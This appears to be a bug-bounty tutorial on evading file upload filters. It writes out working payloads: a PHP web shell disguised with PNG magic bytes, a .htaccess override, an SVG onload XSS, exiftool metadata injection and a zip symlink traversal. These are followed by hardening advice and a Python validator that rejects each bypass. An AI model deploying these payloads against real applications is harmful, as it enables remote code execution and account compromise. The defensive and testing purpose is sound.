File upload misconfigurations can be a goldmine for bug bounty hunters, enabling vulnerabilities such as Stored XSS or even Remote Code Execution (RCE). Many applications restrict file uploads to block malicious files (e.g., test.php, test.html). However, attackers can bypass these restrictions using a method that disguises the payload as an image file (e.g., test.png).
You Should Know:
1. Magic Bytes Bypass
Some applications check only the file extension or only the file signature. By prepending the magic bytes (file signature) of an image format such as PNG to a PHP file, you can trick the check:
echo -e '\x89PNG\r\n\x1a\n<?php system($_GET["cmd"]); ?>' > shell.png.php
2. Double Extension Attack
If blacklisting is weak, use:
shell.png.php
shell.php.jpg
3. Content-Type Manipulation
Intercept the upload request and modify:
Content-Type: image/png
4. Null Byte Injection (Older Systems)
shell.php%00.png
5. .htaccess Override (Apache)
Upload a malicious `.htaccess` to execute images as PHP:
AddType application/x-httpd-php .png
6. SVG XSS Payload
Upload an SVG with JavaScript:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
7. Exif Data Injection
Insert PHP code into image metadata:
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
8. Zip File Upload + Path Traversal
Compress a PHP file and exploit extraction:
zip --symlinks evil.zip ../shell.php
9. Case Sensitivity Bypass
shell.PHp
shell.pHp5
10. MIME Type Spoofing
Use tools like Burp Suite to change:
Content-Disposition: form-data; name="file"; filename="shell.png"
Content-Type: application/x-php
What Undercode Say
File upload vulnerabilities remain a critical attack vector. Always:
– Validate both the extension and the content (e.g., with the `file` command on Linux), and never trust the client-supplied Content-Type.
– Store files outside the web root or use random filenames.
– Disable script execution in upload directories (permissions alone do not stop the web server's PHP handler; also remove the handler for that directory in the server configuration):
chmod -R 755 uploads/
find uploads/ -type f -exec chmod 644 {} \;
– Use WAF rules to block double extensions and null bytes.
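The following is an added example (not code from the original post) showing how a server-side check can apply these defences in one place: it rejects null bytes, path traversal, double and disguised extensions, `.htaccess`, SVG, and image bodies that carry embedded PHP or script markers, requires the content to start with the signature of the declared type, and assigns a random server-chosen filename. The storage directory `UPLOAD_DIR` and the helper name `check_upload` are assumptions for illustration; the sample inputs in `__main__` are constructed.

```python
import os
import secrets

# Allow-list of extensions the application actually needs, each mapped to the
# file signature (magic bytes) that content of that type must start with.
ALLOWED_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Byte patterns that have no business inside an image: an embedded PHP open
# tag (Exif/comment injection) or script markup (SVG-style payloads).
FORBIDDEN_CONTENT = (b"<?php", b"<?=", b"<script", b"onload=")

# Hypothetical storage directory outside the web root (assumption).
UPLOAD_DIR = "/srv/app-data/uploads"


def check_upload(filename: str, data: bytes, max_bytes: int = 5 * 1024 * 1024) -> dict:
    """Return {'ok': True, 'stored_as': ..., 'path': ...} or {'ok': False, 'reason': ...}."""

    def reject(reason: str) -> dict:
        return {"ok": False, "reason": reason}

    # 1. Null bytes, raw or URL-encoded, must never reach a filesystem call.
    if "\x00" in filename or "%00" in filename:
        return reject("null byte in filename")

    # 2. Strip any path component and refuse traversal attempts outright.
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base in (".", "..") or ".." in filename:
        return reject("bad path component")

    # 3. Exactly one extension: stops shell.png.php, shell.php.jpg and .htaccess
    #    (an empty stem). Case is folded so shell.PHp / shell.pHp5 are not listed.
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or "." in stem:
        return reject("missing or multiple extensions")
    ext = ext.lower()
    if ext not in ALLOWED_SIGNATURES:
        return reject(f"extension .{ext} not allowed")

    # 4. Bound the size before inspecting content.
    if len(data) > max_bytes:
        return reject("file too large")

    # 5. The body must carry the signature of the declared type; the client's
    #    Content-Type header is never consulted because it is attacker-controlled.
    if not any(data.startswith(sig) for sig in ALLOWED_SIGNATURES[ext]):
        return reject("content does not match declared type")

    # 6. Scan the whole body for interpreter or script markers (Exif injection).
    lowered = data.lower()
    for marker in FORBIDDEN_CONTENT:
        if marker in lowered:
            return reject(f"forbidden content {marker!r}")

    # 7. Never reuse the client's name: random name, server-chosen extension,
    #    stored outside the web root.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return {"ok": True, "stored_as": stored, "path": os.path.join(UPLOAD_DIR, stored)}


if __name__ == "__main__":
    # Constructed sample uploads mirroring the bypass attempts listed above.
    samples = [
        ("shell.png.php", b"\x89PNG\r\n\x1a\n<?php echo 1; ?>"),
        ("shell.php%00.png", b"\x89PNG\r\n\x1a\n"),
        ("shell.PHp", b"\x89PNG\r\n\x1a\n"),
        (".htaccess", b"AddType application/x-httpd-php .png"),
        ("image.jpg", b"\xff\xd8\xff\xe1" + b"<?php echo 1; ?>"),
        ("payload.svg", b"<svg onload=\"x\"/>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32),
    ]
    for name, body in samples:
        print(name, "->", check_upload(name, body))
```

Only the last sample is accepted; every other one maps to a rejection reason that a log line can carry, which makes repeated bypass attempts against the endpoint easy to alert on.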
For defenders, test uploads rigorously. For attackers, these techniques can lead to RCE, XSS, or LFI.
Expected Output:
A successfully uploaded malicious file leading to arbitrary code execution or stored XSS in the target application.
Reference: Bypassing File Upload Restrictions Video
Reported By: Faiyaz Ahmad – Hackers Feeds